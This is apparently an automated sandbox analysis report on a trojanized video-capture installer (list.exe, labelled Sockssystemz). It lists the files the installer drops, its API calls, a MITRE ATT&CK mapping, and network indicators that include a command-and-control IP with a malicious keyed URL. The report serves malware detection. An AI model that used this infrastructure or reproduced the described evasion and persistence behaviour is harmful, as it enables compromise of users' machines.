                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094B54C sqlite3_bind_int64, sqlite3_step, sqlite3_column_int64, sqlite3_reset, memmove
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60925686 sqlite3_bind_int64, sqlite3_mutex_leave
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094A6C5 sqlite3_bind_int64, sqlite3_step, sqlite3_column_blob, sqlite3_column_bytes, sqlite3_malloc, sqlite3_reset, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609256E5 sqlite3_bind_int, sqlite3_bind_int64
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094B6ED sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6092562A sqlite3_bind_blob
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60925655 sqlite3_bind_null, sqlite3_mutex_leave
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094C64A sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609687A7 sqlite3_bind_int64, sqlite3_bind_int, sqlite3_step, sqlite3_reset, sqlite3_bind_int64, sqlite3_bind_int, sqlite3_step, sqlite3_column_blob, sqlite3_column_bytes, sqlite3_column_int64, sqlite3_reset, sqlite3_free, sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_bind_int64, sqlite3_bind_blob, sqlite3_bind_int64, sqlite3_bind_int, sqlite3_step, sqlite3_reset, sqlite3_free, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095F7F7 sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6092570B sqlite3_bind_double, sqlite3_mutex_leave
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095F772 sqlite3_bind_int64, sqlite3_bind_blob, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60925778 sqlite3_bind_value, sqlite3_bind_int64, sqlite3_bind_double, sqlite3_bind_blob
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6090577D sqlite3_bind_parameter_name
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094B764 sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_step
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6090576B sqlite3_bind_parameter_count
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094A894 sqlite3_bind_int64, sqlite3_step, sqlite3_column_int64, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095F883 sqlite3_bind_int64, sqlite3_bind_int, sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_bind_blob, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094C8C2 sqlite3_value_int, sqlite3_value_int, sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_bind_null, sqlite3_bind_null, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096281E sqlite3_mprintf, sqlite3_vtab_config, sqlite3_malloc, sqlite3_mprintf, sqlite3_mprintf, sqlite3_errmsg, sqlite3_mprintf, sqlite3_free, sqlite3_mprintf, sqlite3_exec, sqlite3_free, sqlite3_prepare_v2, sqlite3_bind_text, sqlite3_step, sqlite3_column_int64, sqlite3_finalize, sqlite3_mprintf, sqlite3_prepare_v2, sqlite3_free, sqlite3_errmsg, sqlite3_mprintf, sqlite3_mprintf, sqlite3_mprintf, sqlite3_free, sqlite3_mprintf, sqlite3_free, sqlite3_declare_vtab, sqlite3_errmsg, sqlite3_mprintf, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096583A memcmp, sqlite3_realloc, qsort, sqlite3_malloc, sqlite3_free, sqlite3_bind_int64, sqlite3_bind_int64, sqlite3_column_int64, sqlite3_column_int64, sqlite3_column_int64, sqlite3_column_bytes, sqlite3_column_blob, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095F9AD sqlite3_bind_int, sqlite3_step, sqlite3_column_type, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094A92B sqlite3_bind_int64, sqlite3_bind_null, sqlite3_bind_blob, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6090EAE5 sqlite3_transfer_bindings
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095FB98 sqlite3_value_int, sqlite3_bind_int, sqlite3_bind_value, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095ECA6 sqlite3_mprintf, sqlite3_mprintf, sqlite3_mprintf, sqlite3_prepare_v2, sqlite3_free, sqlite3_bind_value
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095FCCE sqlite3_malloc, sqlite3_free, sqlite3_bind_int64, sqlite3_bind_blob, sqlite3_step, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095FDAE sqlite3_malloc, sqlite3_bind_int, sqlite3_step, sqlite3_column_bytes, sqlite3_column_blob, sqlite3_reset, sqlite3_free, sqlite3_free, sqlite3_bind_int, sqlite3_bind_blob, sqlite3_step, sqlite3_reset, sqlite3_free
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60966DF1 sqlite3_value_text, sqlite3_mprintf, sqlite3_free, strcmp, sqlite3_free, sqlite3_malloc, sqlite3_bind_int64, sqlite3_step, sqlite3_column_type, sqlite3_reset, sqlite3_column_blob, sqlite3_reset, sqlite3_malloc, sqlite3_free, sqlite3_reset, sqlite3_result_error_code, sqlite3_result_blob
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60969D75 sqlite3_bind_int, sqlite3_step, sqlite3_column_int, sqlite3_reset
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095FFB2 sqlite3_bind_int64, sqlite3_step, sqlite3_reset, sqlite3_result_error_code
                    MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count the report shows next to that technique, techniques without a number carry no count in the report)

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                    Execution: Windows Management Instrumentation (1); Native API (3); Command and Scripting Interpreter (2); Service Execution (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                    Persistence: DLL Side-Loading (1); Windows Service (15); Bootkit (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (15); Process Injection (2); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (21); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (131); Access Token Manipulation (1); Process Injection (2); Bootkit (1)
                    Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                    Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (46); Security Software Discovery (271); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (11); System Owner/User Discovery (3); System Network Configuration Discovery (1)
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                    Collection: Archive Collected Data (1); Input Capture (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                    Command and Control: Ingress Tool Transfer (2); Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                    Behavior Graph (ID: 1577465, Sample: list.exe, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100). Information recoverable from the graph text:
                    - Top-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 7 other signatures. DNS: time.windows.com.
                    - list.exe drops C:\Users\user\AppData\Local\Temp\...\list.tmp (PE32) and starts list.tmp.
                    - list.tmp drops C:\Users\user\AppData\Local\...\_iscrypt.dll (PE32), C:\Users\user\AppData\...\unins000.exe (copy) (PE32), C:\Users\user\AppData\Local\...\is-FUIGA.tmp (PE32) and 17 other files (9 malicious), and starts bsoftvideocapture33.exe.
                    - bsoftvideocapture33.exe drops C:\ProgramData\...\sqlite3.dll (PE32) and C:\...\BrekkiesoftVideoCapture.exe (PE32) and connects to 188.119.66.185 (port 443, local ports 49795 and 49804; FLYNETRU, Russian Federation).
                    - svchost.exe triggers "Changes security center settings (notifications, updates, antivirus, firewall)" and starts MpCmdRun.exe, which starts conhost.exe; a further svchost.exe and 4 other processes are also started.

                    Source | Detection | Scanner | Label | Link
                    list.exe | 47% | ReversingLabs | Win32.Trojan.Sockssystemz |

                    Source | Detection | Scanner | Label | Link
                    C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | 100% | Joe Sandbox ML | |
                    C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe | 38% | ReversingLabs | |
                    C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\LTDIS13n.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | 38% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\gdiplus.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-0G4JQ.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-1B315.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-5FBME.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-A2HQB.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-B9LPS.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-KK3F9.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-P0L8V.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\ltkrn13n.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcp71.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcr71.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\sqlite3.dll (copy) | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\is-FUIGA.tmp | 4% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\unins000.exe (copy) | 4% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | |
                    C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | 4% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    https://188.119.66.185/C | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/. | 0% | Avira URL Cloud | safe |
                    https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | 0% | Avira URL Cloud | safe |
                    http://wonderwork.ucoz.com/ | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/5 | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/&Du= | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/J | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a | 100% | Avira URL Cloud | malware |
                    http://www.bingmapsportal.com | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/ography | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/MH | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/) | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/h5 | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/N/ | 0% | Avira URL Cloud | safe |
                    https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325 | 100% | Avira URL Cloud | malware |
                    https://188.119.66.185/v | 0% | Avira URL Cloud | safe |
                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | 0% | Avira URL Cloud | safe |
                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | 0% | Avira URL Cloud | safe |
                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | 0% | Avira URL Cloud | safe |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    time.windows.com | unknown | unknown | false | | high

                    Name | Malicious | Antivirus Detection | Reputation
                    https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a | false | Avira URL Cloud: malware | unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUlist.exefalse
                              high
                              https://188.119.66.185/bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000003.1375390941.000001769B26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375597565.000001769B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://188.119.66.185/5bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://188.119.66.185/priseCertificatesbsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://188.119.66.185/.bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://188.119.66.185/en-USbsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://188.119.66.185/rosoftbsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://wonderwork.ucoz.com/list.tmp, 00000002.00000002.2504041070.0000000005AEE000.00000004.00001000.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000000.1278473609.00000000004D4000.00000002.00000001.01000000.0000000A.sdmp, BrekkiesoftVideoCapture.exe.6.dr, bsoftvideocapture33.exe.2.dr, is-7DT4P.tmp.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://188.119.66.185/Cbsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.bingmapsportal.comsvchost.exe, 00000003.00000002.1376008864.000001769B213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375597565.000001769B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/J | bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375456752.000001769B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.innosetup.com/ | list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.dr | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/ography | bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000003.00000002.1376167533.000001769B277000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375318633.000001769B275000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375456752.000001769B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000003.00000003.1375621378.000001769B249000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375663325.000001769B231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375609527.000001769B24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | list.exe | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375535185.000001769B25E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/&Du= | bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000003.00000003.1375609527.000001769B24A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/MH | bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/ | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/) | bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://188.119.66.185/N/ | bsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.dr | false | | high
https://dynamic.t | svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/h5 | bsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/v | bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmp | false | • Avira URL Cloud: safe | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmp | false | | high
